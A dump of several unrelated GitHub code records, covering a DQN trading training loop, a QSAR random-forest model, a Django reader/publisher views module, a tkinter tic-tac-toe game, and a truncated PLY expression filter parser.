= torch.tensor(batch).to(device)\n action_values_v = net(states_v)\n best_action_values_v = action_values_v.max(1)[0]\n mean_vals.append(best_action_values_v.mean().item())\n return np.mean(mean_vals)\n\n\ndef unpack_batch(batch):\n states, actions, rewards, dones, last_states = [], [], [], [], []\n for exp in batch:\n state = np.array(exp.state, copy=False)\n states.append(state)\n actions.append(exp.action)\n rewards.append(exp.reward)\n dones.append(exp.last_state is None)\n if exp.last_state is None:\n last_states.append(state) # the result will be masked anyway\n else:\n last_states.append(np.array(exp.last_state, copy=False))\n return np.array(states, copy=False), np.array(actions), np.array(rewards, dtype=np.float32), \\\n np.array(dones, dtype=np.uint8), np.array(last_states, copy=False)\n\n\ndef calc_loss(batch, net, tgt_net, gamma, device=\"cpu\"):\n states, actions, rewards, dones, next_states = unpack_batch(batch)\n\n states_v = torch.tensor(states).to(device)\n next_states_v = torch.tensor(next_states).to(device)\n actions_v = torch.tensor(actions).to(device)\n rewards_v = torch.tensor(rewards).to(device)\n done_mask = torch.ByteTensor(dones).to(device)\n\n state_action_values = net(states_v).gather(1, actions_v.unsqueeze(-1)).squeeze(-1)\n next_state_actions = net(next_states_v).max(1)[1]\n next_state_values = tgt_net(next_states_v).gather(1, next_state_actions.unsqueeze(-1)).squeeze(-1)\n next_state_values[done_mask] = 0.0\n\n expected_state_action_values = next_state_values.detach() * gamma + rewards_v\n return nn.MSELoss()(state_action_values, expected_state_action_values)\n\n\n# initialize networks\nif True:\n cuda = True\n run = 'qrl'\n device = torch.device(\"cuda\" if cuda else \"cpu\")\n \n saves_path = os.path.join(\"/home/user/QRLDumps\", run)\n os.makedirs(saves_path, exist_ok=True)\n\n # read big array\n lob_order, lobs = ReadLobs('lob.txt')\n candles15min_order, candles15min = ReadCandles('min15.txt')\n candles1min_order, candles1min = ReadCandles('min1.txt')\n candles1sec_order, candles1sec = ReadCandles('sec1.txt')\n\n # find 4h point after start and 15 min point before end of data\n lob_order_len = len(lob_order)\n start_time = lob_order[0]\n ind = 0\n cur_time = lob_order[ind]\n diff = 4 * 60 * 60 * 1000 # 4 hours in ms\n \n while ((cur_time - start_time) < diff):\n ind += 1\n cur_time = lob_order[ind]\n \n start_random_time = ind\n \n # find 1h point before end of data\n end_time = lob_order[lob_order_len - 1]\n ind = (lob_order_len - 1)\n cur_time = lob_order[ind]\n diff = 60 * 60 * 1000 # 1h im ms\n \n while ((end_time - cur_time) < diff):\n ind -= 1\n cur_time = lob_order[ind]\n \n end_random_time = ind \n \n env = QRLEnv(lob_order, lobs, candles15min_order, candles15min, candles1min_order, candles1min, candles1sec_order, candles1sec, start_random_time, end_random_time, DEFAULT_EVENT_COUNT, DEFAULT_TRADE_COUNT, DEFAULT_CANDLE_COUNT)\n env.reset() \n env = gym.wrappers.TimeLimit(env, max_episode_steps=1000) \n\n print(env.observation_space.shape)\n print(env.action_space.n)\n \n net = DQN(DEFAULT_LOB_NUM_LEVEL, DEFAULT_EVENT_COUNT, DEFAULT_EVENT_WIDTH, DEFAULT_CANDLE_COUNT, DEFAULT_CANDLE_WIDTH, \n DEFAULT_TRADE_COUNT, DEFAULT_TRADE_WIDTH, DEFAULT_AP_WIDTH, DEFAULT_SUPRES_WIDTH, DEFAULT_ACTION_N).to(device)\n\n tgt_net = ptan.agent.TargetNet(net)\n selector = ptan.actions.EpsilonGreedyActionSelector(EPSILON_START)\n agent = ptan.agent.DQNAgent(net, selector, device=device)\n exp_source = ptan.experience.ExperienceSourceFirstLast(env, agent, GAMMA, steps_count=REWARD_STEPS)\n buffer = ptan.experience.ExperienceReplayBuffer(exp_source, REPLAY_SIZE)\n optimizer = optim.Adam(net.parameters(), lr=LEARNING_RATE)\n \n # main training loop\n step_idx = 0\n eval_states = None\n best_mean_val = None\n \n \n# do the main learning loop \nif True:\n with RewardTracker(np.inf, group_rewards=100) as reward_tracker:\n while True:\n step_idx += 1\n buffer.populate(1)\n selector.epsilon = max(EPSILON_STOP, EPSILON_START - step_idx / EPSILON_STEPS)\n\n new_rewards = exp_source.pop_rewards_steps()\n if new_rewards:\n val = reward_tracker.reward(new_rewards[0], step_idx, selector.epsilon)\n if val:\n break\n\n if len(buffer) < REPLAY_INITIAL:\n continue\n\n if eval_states is None:\n print(\"Initial buffer populated, start training\")\n eval_states = buffer.sample(STATES_TO_EVALUATE)\n eval_states = [np.array(transition.state, copy=False) for transition in eval_states]\n eval_states = np.array(eval_states, copy=False)\n\n if step_idx % EVAL_EVERY_STEP == 0:\n mean_val = calc_values_of_states(eval_states, net, device=device)\n #writer.add_scalar(\"values_mean\", mean_val, step_idx)\n if best_mean_val is None or best_mean_val < mean_val:\n if best_mean_val is not None:\n print(\"%d: Best mean value updated %.3f -> %.3f\" % (step_idx, best_mean_val, mean_val))\n best_mean_val = mean_val \n\n optimizer.zero_grad()\n batch = buffer.sample(BATCH_SIZE)\n loss_v = calc_loss(batch, net, tgt_net.target_model, GAMMA ** REWARD_STEPS, device=device)\n loss_v.backward()\n optimizer.step()\n\n if step_idx % TARGET_NET_SYNC == 0:\n tgt_net.sync()\n\n if step_idx % CHECKPOINT_EVERY_STEP == 0:\n idx = step_idx // CHECKPOINT_EVERY_STEP\n torch.save(net.state_dict(), os.path.join(saves_path, \"checkpoint-%3d.data\" % idx)) \n \n \n\n\n\n \n\n\n \n \n \n \n \n\n","repo_name":"akirnasov/Quantum-RL","sub_path":"mainQRL.py","file_name":"mainQRL.py","file_ext":"py","file_size_in_byte":8601,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"30632968120","text":"import pandas as pd\r\nimport numpy as np\r\nimport seaborn as sns\r\nimport matplotlib.pyplot as plt\r\nfrom sklearn.model_selection import train_test_split\r\nfrom sklearn.ensemble import RandomForestRegressor\r\nfrom sklearn.feature_selection import VarianceThreshold\r\n\r\n\r\n\"\"\"\r\nLoad the dataset\r\n\"\"\"\r\npath = \"https://github.com/dataprofessor/data/raw/master/acetylcholinesterase_06_bioactivity_data_3class_pIC50_pubchem_fp.csv\"\r\n\r\ndf = pd.read_csv(path)\r\n# print(df.head())\r\n\r\n\"\"\"\r\nDefine Input features\r\n\r\nThe dataset contains 307 input features\r\nand 1 output variable (pIC50).\r\nRemember to drop the 'Name' variable\r\n\"\"\"\r\ndrop_variable = 'pIC50'\r\nX = df.drop(drop_variable, axis=1)\r\n\r\n# convert all values in all columns of the new X\r\n# dataframe to type 'float'\r\n# X = X.astype(float)\r\n\r\n# print(X.head())\r\n\r\n\"\"\"\r\nOutput features\r\n\"\"\"\r\ny = df.pIC50\r\n# print(y.head())\r\n\r\n\"\"\"\r\nExamine data dimensions\r\n\"\"\"\r\ndef data_dimensions():\r\n print(X.shape)\r\n print(y.shape)\r\n\r\n# data_dimensions()\r\n\r\n\"\"\"\r\nRemove low variance features\r\n\r\nOnly 12 features would be left!\r\n# \"\"\"\r\nselection = VarianceThreshold(\r\n threshold=(.8 * (1 - .8)))\r\nX = selection.fit_transform(X)\r\n# print(X.shape) # 12 features left\r\n\r\n\"\"\"\r\nData split (80/20 ratio)\r\n\"\"\"\r\nX_train, X_test, y_train, y_test = train_test_split(\r\n X, y, test_size=0.2)\r\n\r\ndef train_test_data_shapes():\r\n print(f\"X_train.shape, y_train.shape = {X_train.shape}, {y_train.shape}\")\r\n print(f\"X_test.shape, y_test.shape = {X_test.shape}, {y_test.shape}\")\r\n\r\n# train_test_data_shapes()\r\n\r\n\"\"\"\r\nBuilding a Regression Model using \r\nRandom Forest regressor algorithm\r\n\"\"\"\r\nnp.random.seed(100)\r\nmodel = RandomForestRegressor(n_estimators=100)\r\nmodel.fit(X_train, y_train)\r\nr2 = model.score(X_test, y_test)\r\n# print(r2)\r\n\r\n\"\"\"\r\nGet all predicted values\r\n\"\"\"\r\nY_pred = model.predict(X_test)\r\n\r\n\"\"\"\r\nScatter Plot of Experimental vs Predicted \r\npIC50 Values\r\n\"\"\"\r\ndef scatter_last():\r\n sns.set(color_codes=True)\r\n sns.set_style(\"white\")\r\n\r\n ax = sns.regplot(y_test, Y_pred,\r\n scatter_kws={'alpha':0.4})\r\n ax.set_xlabel('Experimental pIC50',\r\n fontsize='large', fontweight='bold')\r\n ax.set_ylabel('Predicted pIC50',\r\n fontsize='large', fontweight='bold')\r\n ax.set_xlim(0, 12)\r\n ax.set_ylim(0, 12)\r\n ax.figure.set_size_inches(5, 5)\r\n plt.show()\r\n\r\n# scatter_last()\r\n","repo_name":"Enowtakang/qsar1","sub_path":"7 RF regression model.py","file_name":"7 RF regression model.py","file_ext":"py","file_size_in_byte":2386,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"30061383429","text":"a = [1,2,5,6,3,5,2,8,8,8,5,5,5,2,8]\n\ndic = {}\n\nfor i in a:\n count = 0\n for j in a :\n if i == j:\n count = count+1\n dic[i] = count \n\nmax = 0\nfor i in dic.values():\n if i>max:\n max = i\n\nfor key , value in dic.items():\n if value == max:\n print(key)\n \n","repo_name":"Krupal01/python_programs","sub_path":"majority_element.py","file_name":"majority_element.py","file_ext":"py","file_size_in_byte":297,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"29816461623","text":"import glob\nimport os\n\ntemplate_for_store = \"\"\"\n\t{\n\t\tparsed: false,\n\t\tsource: {\n\t\t\ttype: 'audio',\n\t\t\ttype:'static',\n\t\t\tsources: [\n\t\t\t\t{\n\t\t\t\t\tsrc: '/||filename||',\n\t\t\t\t\ttype: 'audio/mp3'\n\t\t\t\t}\n\t\t\t]\n\t\t}\n\t},\n\"\"\"\n\nfor file in glob.glob(f\"static{os.path.sep}*.mp3\"):\n f = file.split(os.path.sep)[-1]\n print(template_for_store.replace(\"||filename||\", f))","repo_name":"DevParapalli/music-manager","sub_path":"src-helpers/create_store_listing.py","file_name":"create_store_listing.py","file_ext":"py","file_size_in_byte":354,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"8062708733","text":"from django.views.generic import TemplateView\nfrom django.views.generic.base import RedirectView\nfrom django.contrib.auth.mixins import UserPassesTestMixin\nfrom django.utils.translation import LANGUAGE_SESSION_KEY\n\nfrom stories.models import Story\nfrom alerts.models import Alert\n\n\nclass CommonContextMixin(object):\n \"\"\"This mixin makes the email of the logged in user available as\n a template tag. It is responsible for the email to appear in the\n rightmost part of the navbar\n \"\"\"\n\n def get_context_data(self, **kwargs):\n\n context = super(CommonContextMixin, self).get_context_data(**kwargs)\n\n if self.request.user.is_authenticated:\n user = self.request.user\n context[\"email\"] = user.email\n\n return context\n\n\nclass SessionMixin(object):\n\n def track_stories_from_session_data(self, user):\n story_id = self.request.session.get(\"wants_to_track\", None)\n\n if story_id is not None:\n try:\n story = Story.objects.get(id = story_id)\n try:\n Alert.objects.get(story = story, user = user)\n # inform the user that he is already subscribed\n # to this story\n except Alert.DoesNotExist:\n new_alert = Alert(story = story, user = user)\n new_alert.save()\n except Story.DoesNotExist:\n pass\n self.request.session[\"wants_to_track\"] = None\n\n\nclass HomeView(CommonContextMixin, SessionMixin, TemplateView):\n\n template_name = \"home.html\"\n\n def get_context_data(self, **kwargs):\n\n context = super(HomeView, self).get_context_data(**kwargs)\n\n if self.request.user.is_authenticated:\n user = self.request.user\n if user.is_publisher:\n self.template_name = \"publisher_home.html\"\n else:\n self.template_name = \"reader_home.html\"\n\n #If the reader logs in after visiting a landing page, then\n #this line ensures that he automatically starts tracking the\n #story upon login.\n self.track_stories_from_session_data(user)\n\n alerts = Alert.objects.filter(user = user)\n alerts_sorted_by_unread = sorted(\n alerts, key = lambda item: -item.unread_count()\n )\n\n context[\"object_list\"] = alerts_sorted_by_unread\n\n return context\n\n\nclass ChangeLanguageView(RedirectView):\n\n def get_redirect_url(self):\n language = self.request.GET.get(\"language\", None)\n redirect_url = self.request.GET.get(\"next\", None)\n\n if language is not None:\n self.request.session[LANGUAGE_SESSION_KEY] = language\n\n if redirect_url is None:\n redirect_url = \"/\"\n\n return redirect_url\n","repo_name":"gutfeeling/storybeep","sub_path":"storybeep_backend/storybeep_backend/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2866,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"38131738509","text":"import bisect\nimport collections\nimport copy\nimport functools\nimport math\nfrom typing import List, Optional\nfrom collections import defaultdict\nfrom util import TreeNode, lc_tree2list, lc_list2tree\n\n\n# Definition for a Node.\nclass Node:\n def __init__(self, x: int, next: 'Node' = None, random: 'Node' = None):\n self.val = int(x)\n self.next = next\n self.random = random\n\n\nclass Solution:\n def copyRandomList(self, head: 'Node') -> 'Node':\n if not head:\n return None\n mem_new = dict()\n mem_old = dict()\n hd = head\n rtn = cur = Node(head.val)\n idx = 0\n while head.next:\n mem_new[idx] = cur\n mem_old[head] = idx\n cur.next = Node(head.next.val)\n head = head.next\n cur = cur.next\n idx += 1\n mem_new[idx] = cur\n mem_old[head] = idx\n cur = rtn\n while hd:\n cur.random = mem_new[mem_old[hd.random]] if hd.random else None\n hd = hd.next\n cur = cur.next\n return rtn\n\n\nif __name__ == \"__main__\":\n sol = Solution()\n # test_cases = [\n # [2,2,3,2],\n # [0,1,0,1,0,1,99]\n # ]\n # for i in test_cases:\n # print(sol.singleNumber(i))\n","repo_name":"chyt123/cosmos","sub_path":"coding_everyday/lc101-200/lc138/Copy List with Random Pointer.py","file_name":"Copy List with Random Pointer.py","file_ext":"py","file_size_in_byte":1266,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"21123869235","text":"\"\"\"\nSimple tic tac toe game made with the tkinter GUI toolkit\nEnables the players to choose their displayed names, keep track of the score count and reset the game.\n\nMade by David Santos - https://github.com/odavidsons/tictactoe-GUI-python\n\"\"\"\n\nimport tkinter as tk\nfrom time import sleep\n\nclass App(tk.Frame):\n\n board = [\n ['-','-','-'],\n ['-','-','-'],\n ['-','-','-'],\n ]\n player1 = \"\"\n player2 = \"\"\n turn = player1\n shape = \"\"\n\n def __init__(self, master=None):\n tk.Frame.__init__(self, master)\n self.config(width=75,padx=20,pady=20)\n self.pack()\n \n def renderBoard(self):\n gameBoard = tk.Frame(self,width=40,pady=15)\n gameBoard.pack()\n tile1 = tk.Button(gameBoard,width=5,height=5,text=self.board[0][0],command=lambda x=0, y=0: self.drawShape(x,y,tile1))\n tile1.grid(row=0,column=0)\n tile2 = tk.Button(gameBoard,width=5,height=5,text=self.board[0][1],command=lambda x=0, y=1: self.drawShape(x,y,tile2))\n tile2.grid(row=0,column=1)\n tile3 = tk.Button(gameBoard,width=5,height=5,text=self.board[0][2],command=lambda x=0, y=2: self.drawShape(x,y,tile3))\n tile3.grid(row=0,column=2)\n\n tile4 = tk.Button(gameBoard,width=5,height=5,text=self.board[1][0],command=lambda x=1, y=0: self.drawShape(x,y,tile4))\n tile4.grid(row=1,column=0)\n tile5 = tk.Button(gameBoard,width=5,height=5,text=self.board[1][1],command=lambda x=1, y=1: self.drawShape(x,y,tile5))\n tile5.grid(row=1,column=1)\n tile6 = tk.Button(gameBoard,width=5,height=5,text=self.board[1][2],command=lambda x=1, y=2: self.drawShape(x,y,tile6))\n tile6.grid(row=1,column=2)\n\n tile7 = tk.Button(gameBoard,width=5,height=5,text=self.board[2][0],command=lambda x=2, y=0: self.drawShape(x,y,tile7))\n tile7.grid(row=2,column=0)\n tile8 = tk.Button(gameBoard,width=5,height=5,text=self.board[2][1],command=lambda x=2, y=1: self.drawShape(x,y,tile8))\n tile8.grid(row=2,column=1)\n tile9 = tk.Button(gameBoard,width=5,height=5,text=self.board[2][2],command=lambda x=2, y=2: self.drawShape(x,y,tile9))\n tile9.grid(row=2,column=2)\n\n #Draw a player shape on the board. It receives the position and the button that was pressed to be able to update it's text\n #Also checks if there is a winner when a shape is drawn\n def drawShape(self,row,col,buttonUpdate):\n if self.player1 and self.player2 != \"\":\n current_player = self.turn\n if self.board[row][col] == \"-\":\n self.board[row][col]= self.playerTurn()\n buttonUpdate.config(text=self.board[row][col])\n\n #Check if there is a winner\n if self.checkWin(self.shape) == True:\n print(\"Player: \"+current_player+\" wins!\")\n self.addScore(current_player)\n labelTurn.config(text=\"Player \"+current_player+\" wins!\")\n self.clearBoard()\n else:\n #Check if the board is filled, and call a draw\n if self.checkFilledBoard() == True:\n print(\"It's a draw!\")\n labelTurn.config(text=\"It's a draw!\")\n self.clearBoard()\n else:\n print(\"Please enter the player names!\")\n labelTurn.config(text=\"Please enter the player names!\")\n\n def addScore(self,winner):\n if winner == player1:\n scoreP1.config(text=scoreP1.cget(\"text\")+1)\n else: scoreP2.config(text=scoreP2.cget(\"text\")+1)\n\n #Reset the game board\n def clearBoard(self):\n sleep(1)\n for row in self.board:\n for i in range(len(row)):\n row[i] = \"-\"\n #Get all the widgets in the main window that are buttons, and set their text back to default\n widgets = self.nametowidget(\"!frame\").winfo_children()\n for widget in widgets:\n if str(widget.winfo_name).find(\"button\") != -1 and str(widget.winfo_name).find(\"button10\") == -1:\n widget.config(text=\"-\")\n\n #Reset the game\n def resetGame(self):\n self.clearBoard()\n scoreP1.config(text=0)\n scoreP2.config(text=0)\n self.turn = self.player1\n labelTurn.config(text=\"Turn: \"+self.turn)\n\n #Swap player turns\n def playerTurn(self):\n\n if self.turn == player1:\n self.turn = player2\n labelTurn.config(text=\"Turn: \"+player2)\n self.shape = \"X\"\n return \"X\"\n else:\n labelTurn.config(text=\"Turn: \"+player1)\n self.turn = player1\n self.shape =\"O\"\n return \"O\"\n\n #Verify if there is a winner in the current turn\n def checkWin(self,shape):\n win = False\n if self.board[0][0] == self.board[0][1] == self.board[0][2] == shape: #horizontal 1\n win = True\n elif self.board[1][0] == self.board[1][1] == self.board[1][2] == shape: #horizontal 2\n win = True\n elif self.board[2][0] == self.board[2][1] == self.board[2][2] == shape: #horizontal 3\n win = True\n elif self.board[0][0] == self.board[1][0] == self.board[2][0] == shape: #vertical 1\n win = True\n elif self.board[0][1] == self.board[1][1] == self.board[2][1] == shape: #vertical 2\n win = True\n elif self.board[0][2] == self.board[1][2] == self.board[2][2] == shape: #vertical 3\n win = True\n elif self.board[0][0] == self.board[1][1] == self.board[2][2] == shape: #diagonal 1\n win = True\n elif self.board[0][2] == self.board[1][1] == self.board[2][0] == shape: #diagonal 2\n win = True\n return win\n\n #Check if the board has been filled\n def checkFilledBoard(self):\n filled = True\n for i in range(len(self.board)):\n for l in range(len(self.board)):\n if self.board[i][l] == \"-\": filled = False\n return filled\n\n def inputNamesWindow(self):\n global inputForm,input1,input2\n\n #Create the window for inputing the player names\n inputForm = tk.Toplevel()\n inputForm.title(\"Enter names\")\n label1 = tk.Label(text=\"Player 1: \",master=inputForm)\n label1.grid(row=0,column=0)\n input1 = tk.Entry(master=inputForm)\n input1.grid(row=0,column=1)\n label2 = tk.Label(text=\"Player 2: \",master=inputForm)\n label2.grid(row=1,column=0)\n input2= tk.Entry(master=inputForm)\n input2.grid(row=1,column=1)\n button1 = tk.Button(inputForm,text=\"OK\",command=lambda: self.inputPlayers(input1.get(),input2.get()))\n button1.grid(row=2,column=0,columnspan=2)\n inputForm.attributes('-topmost', True)\n \n #Set the player name variables with the inputs\n def inputPlayers(self,input1,input2):\n global player1,player2\n\n player1 = input1\n labelP1.config(text=player1+\": X\")\n player2 = input2\n labelP2.config(text=player2+\": O\")\n inputForm.destroy()\n self.playerTurn()\n\n#Run application\ngame = App()\ngame.master.title('Tic Tac Toe')\nlabelTurn = tk.Label(game,text=\"Turn\")\nlabelTurn.pack()\n\ngame.renderBoard()\n\ngameInfo = tk.Frame(game)\ngameInfo.pack(fill=\"x\")\n#Display player names\nscoreFrame = tk.Frame(gameInfo,highlightbackground=\"gray\",highlightthickness=1)\nscoreFrame.pack(side=\"right\")\nlabel1 =tk.Label(scoreFrame,text=\"Score\")\nlabel1.pack(side=\"top\")\nscoreP1 = tk.Label(scoreFrame,text=0)\nscoreP1.pack()\nscoreP2 = tk.Label(scoreFrame,text=0)\nscoreP2.pack()\n\n#Display player scores\nplayersFrame = tk.Frame(gameInfo,highlightbackground=\"gray\",highlightthickness=1)\nplayersFrame.pack(side=\"left\")\nlabel2 =tk.Label(playersFrame,text=\"Players\")\nlabel2.pack(side=\"top\")\nlabelP1 =tk.Label(playersFrame,text=\"Player 1:\")\nlabelP1.pack()\nlabelP2 =tk.Label(playersFrame,text=\"Player 2:\")\nlabelP2.pack()\n\nresetFrame = tk.Frame(game,pady=5)\nresetFrame.pack(fill=\"x\")\nresetBtn = tk.Button(resetFrame,text=\"Reset game\",command=game.resetGame)\nresetBtn.pack()\n\ngame.inputNamesWindow()\n\ngame.mainloop()\n","repo_name":"odavidsons/tictactoe-GUI-python","sub_path":"tictactoeGUI.py","file_name":"tictactoeGUI.py","file_ext":"py","file_size_in_byte":8058,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"5914897063","text":"\"\"\"Filter for download\"\"\"\n\nimport re\nfrom datetime import datetime\nfrom typing import Any, Optional, Tuple\n\nfrom ply import lex, yacc\n\nfrom utils.format import get_byte_from_str\nfrom utils.meta_data import MetaData, NoneObj, ReString\n\n\n# pylint: disable = R0904\nclass BaseFilter:\n \"\"\"for normal filter\"\"\"\n\n def __init__(self, debug: bool = False):\n \"\"\"\n Parameters\n ----------\n debug: bool\n If output debug info\n\n \"\"\"\n self.names: dict = {}\n self.debug = debug\n # Build the lexer and parser\n # lex.lex(module=self)\n self.lexer = lex.lex(module=self)\n self.yacc = yacc.yacc(module=self)\n\n def reset(self):\n \"\"\"Reset all symbol\"\"\"\n self.names.clear()\n\n def exec(self, filter_str: str) -> Any:\n \"\"\"Exec filter str\"\"\"\n # ) #\n # return yacc.parse(filter_str, debug=self.debug)\n return self.yacc.parse(filter_str, debug=self.debug)\n\n def _output(self, output_str: str):\n \"\"\"For print debug info\"\"\"\n if self.debug:\n print(output_str)\n\n reserved = {\n \"and\": \"AND\",\n \"or\": \"OR\",\n }\n\n tokens = (\n \"NAME\",\n \"NUMBER\",\n \"GE\",\n \"LE\",\n \"LOR\",\n \"LAND\",\n \"STRING\",\n \"RESTRING\",\n \"BYTE\",\n \"EQ\",\n \"NE\",\n \"TIME\",\n \"AND\",\n \"OR\",\n )\n\n literals = [\"=\", \"+\", \"-\", \"*\", \"/\", \"(\", \")\", \">\", \"<\"]\n\n # t_NAME = r'[a-zA-Z_][a-zA-Z0-9_]*'\n t_GE = r\">=\"\n t_LE = r\"<=\"\n t_LOR = r\"\\|\\|\"\n t_LAND = r\"&&\"\n t_EQ = r\"==\"\n t_NE = r\"!=\"\n\n def t_BYTE(self, t):\n r\"\\d{1,}(B|KB|MB|GB|TB)\"\n t.value = get_byte_from_str(t.value)\n t.type = \"NUMBER\"\n return t\n\n def t_TIME(self, t):\n r\"\\d{4}-\\d{1,2}-\\d{1,2}[ ]{1,}\\d{1,2}:\\d{1,2}:\\d{1,2}\"\n t.value = datetime.strptime(t.value, \"%Y-%m-%d %H:%M:%S\")\n return t\n\n def t_STRING(self, t):\n r\"'.*?'\"\n # r\"'([^\\\\']+|\\\\'|\\\\\\\\)*'\"\n t.value = t.value[1:-1]\n return t\n\n def t_RESTRING(self, t):\n r\"r'.*?'\"\n # r\"r'([^\\\\']+|\\\\'|\\\\\\\\)*'\"\n t.value = t.value[2:-1]\n return t\n\n def t_NAME(self, t):\n r\"[a-zA-Z_][a-zA-Z0-9_]*\"\n t.type = BaseFilter.reserved.get(t.value, \"NAME\")\n return t\n\n def t_NUMBER(self, t):\n r\"\\d+\"\n t.value = int(t.value)\n return t\n\n t_ignore = \" \\t\"\n\n def t_newline(self, t):\n r\"\\n+\"\n t.lexer.lineno += t.value.count(\"\\n\")\n\n def t_error(self, t):\n \"\"\"print error\"\"\"\n print(f\"Illegal character '{t.value[0]}'\")\n t.lexer.skip(1)\n\n precedence = (\n (\"left\", \"LOR\", \"OR\"),\n (\"left\", \"LAND\", \"AND\"),\n (\"left\", \"EQ\", \"NE\"),\n (\"nonassoc\", \">\", \"<\", \"GE\", \"LE\"),\n (\"left\", \"+\", \"-\"),\n (\"left\", \"*\", \"/\"),\n (\"right\", \"UMINUS\"),\n )\n\n def p_statement_assign(self, p):\n 'statement : NAME \"=\" expression'\n return self.p_expression_eq(p)\n # self.names[p[1]] = p[3]\n\n def p_statement_expr(self, p):\n \"statement : expression\"\n self._output(p[1])\n p[0] = p[1]\n\n def p_expression_binop(self, p):\n \"\"\"expression : expression '+' expression\n | expression '-' expression\n | expression '*' expression\n | expression '/' expression\"\"\"\n self.check_type(p)\n if isinstance(p[1], NoneObj):\n p[1] = 0\n if isinstance(p[3], NoneObj):\n p[3] = 0\n\n if p[2] == \"+\":\n p[0] = p[1] + p[3]\n elif p[2] == \"-\":\n p[0] = p[1] - p[3]\n elif p[2] == \"*\":\n p[0] = p[1] * p[3]\n elif p[2] == \"/\":\n p[0] = p[1] / p[3]\n\n self._output(f\"binop {p[1]} {p[2]} {p[3]} = {p[0]}\")\n\n def p_expression_comp(self, p):\n \"\"\"expression : expression '>' expression\n | expression '<' expression\"\"\"\n self.check_type(p)\n if isinstance(p[1], NoneObj) or isinstance(p[3], NoneObj):\n p[0] = True\n return\n\n if p[1] is None or p[3] is None:\n p[0] = False\n return\n if p[2] == \">\":\n p[0] = p[1] > p[3]\n elif p[2] == \"<\":\n p[0] = p[1] < p[3]\n\n def p_expression_uminus(self, p):\n \"expression : '-' expression %prec UMINUS\"\n p[0] = -p[2]\n\n def p_expression_ge(self, p):\n \"expression : expression GE expression\"\n self.check_type(p)\n if isinstance(p[1], NoneObj) or isinstance(p[3], NoneObj):\n p[0] = True\n return\n\n if p[1] is None or p[3] is None:\n p[0] = False\n return\n\n p[0] = p[1] >= p[3]\n self._output(f\"{p[1]} {p[2]} {p[3]} {p[0]}\")\n\n def p_expression_le(self, p):\n \"expression : expression LE expression\"\n self.check_type(p)\n if isinstance(p[1], NoneObj) or isinstance(p[3], NoneObj):\n p[0] = True\n return\n\n if p[1] is None or p[3] is None:\n p[0] = False\n return\n\n p[0] = p[1] <= p[3]\n self._output(f\"{p[1]} {p[2]} {p[3]} = {p[0]}\")\n\n def p_expression_eq(self, p):\n \"expression : expression EQ expression\"\n self.check_type(p)\n if isinstance(p[1], NoneObj) or isinstance(p[3], NoneObj):\n p[0] = True\n return\n\n if p[1] is None or p[3] is None:\n p[0] = False\n return\n\n if isinstance(p[3], ReString):\n if not isinstance(p[1], str):\n p[0] = 0\n return\n p[0] = re.fullmatch(p[3].re_string, p[1], re.MULTILINE) is not None\n self._output(f\"{p[1]} {p[2]} {p[3].re_string} {p[0]}\")\n elif isinstance(p[1], ReString):\n if not isinstance(p[3], str):\n p[0] = 0\n return\n p[0] = re.fullmatch(p[1].re_string, p[3], re.MULTILINE) is not None\n self._output(f\"{p[1]} {p[2]} {p[3].re_string} {p[0]}\")\n else:\n p[0] = p[1] == p[3]\n self._output(f\"{p[1]} {p[2]} {p[3]} {p[0]}\")\n\n def p_expression_ne(self, p):\n \"expression : expression NE expression\"\n self.check_type(p)\n if isinstance(p[1], NoneObj) or isinstance(p[3], NoneObj):\n p[0] = True\n return\n\n if p[1] is None or p[3] is None:\n p[0] = False\n return\n if isinstance(p[3], ReString):\n if not isinstance(p[1], str):\n p[0] = 0\n return\n p[0] = re.fullmatch(p[3].re_string, p[1], re.MULTILINE) is None\n self._output(f\"{p[1]} {p[2]} {p[3].re_string} {p[0]}\")\n elif isinstance(p[1], ReString):\n if not isinstance(p[3], str):\n p[0] = 0\n return\n p[0] = re.fullmatch(p[1].re_string, p[3], re.MULTILINE) is None\n self._output(f\"{p[1]} {p[2]} {p[3].re_string} {p[0]}\")\n else:\n p[0] = p[1] != p[3]\n self._output(f\"{p[1]} {p[2]} {p[3]} = {p[0]}\")\n\n def p_expression_group(self, p):\n \"expression : '(' expression ')'\"\n p[0] = p[2]\n\n def p_expression_number(self, p):\n \"expression : NUMBER\"\n p[0] = p[1]\n\n def p_expression_time(self, p):\n \"expression : TIME\"\n p[0] = p[1]\n\n def p_expression_byte(self, p):\n \"expression : BYTE\"\n p[0] = p[1]\n\n def p_expression_name(self, p):\n \"expression : NAME\"\n try:\n p[0] = self.names[p[1]]\n except Exception as e:\n self._output(f\"Undefined name '{p[1]}'\")\n raise ValueError(f\"Undefined name {p[1]}\") from e\n # FIXME: not support not exist name\n # p[0] = NoneObj()\n\n def p_expression_lor(self, p):\n \"expression : expression LOR expression\"\n p[0] = p[1] or p[3]\n\n def p_expression_land(self, p):\n \"expression : expression LAND expression\"\n p[0] = p[1] and p[3]\n\n def p_expression_or(self, p):\n \"expression : expression OR expression\"\n p[0] = p[1] or p[3]\n\n def p_expression_and(self, p):\n \"expression : expression AND expression\"\n p[0] = p[1] and p[3]\n\n def p_expression_string(self, p):\n \"expression : STRING\"\n p[0] = p[1]\n\n def p_expression_restring(self, p):\n \"expression : RESTRING\"\n p[0] = ReString(p[1])\n self._output(\"RESTRING : \" + p[0].re_string)\n\n # pylint: disable = C0116\n def p_error(self, p):\n if p:\n raise ValueError(f\"Syntax error at '{p.value}'\")\n\n raise ValueError(\"Syntax error at EOF\")\n\n def check_type(self, p):\n \"\"\"Check filter type if is right\"\"\"\n if p[1] is None or p[1] is NoneObj or p[3] is None or p[3] is NoneObj:\n return\n if isinstance(p[1], str):\n if not isinstance(p[3], str) and not isinstance(p[3], ReString):\n raise ValueError(f\"{p[1]} is str but {p[3]} is not\")\n elif isinstance(p[1], int):\n if not isinstance(p[3], int):\n raise ValueError(f\"{p[1]} is int but {p[3]} is not\")\n elif 